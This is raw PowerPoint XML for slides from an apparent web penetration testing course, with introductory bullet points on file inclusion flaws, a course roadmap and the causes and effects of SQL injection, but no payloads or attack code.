              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Local file include allows for the attacker to read files from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This would be information disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remote file include allows the attacker to retrieve files from remote server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The contents of the file would then be used by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This opens a potential for code execution</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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a:xfrm>
            <a:off x="1865312" y="381000"/>
            <a:ext cx="5413375" cy="722313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a: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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525779" y="1609725"/>
            <a:ext cx="8092440" cy="4116387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL injection is a flaw that allows us to control what query is run by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requires an understanding of SQL and database structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These types of flaws allows for data disclosure and other attacks against the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We could create user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Modify transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Change records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="10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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port scan the internal network</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889000" y="152400"/>
            <a:ext cx="7340600" cy="1158240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a: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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Causes of SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1737360"/>
            <a:ext cx="8046720" cy="4187825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The application developer did not perform input validation when they accepted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The user input is then made part of a SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Specially formatted input will cause the SQL database to run the attacker's choice of queries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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovering SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
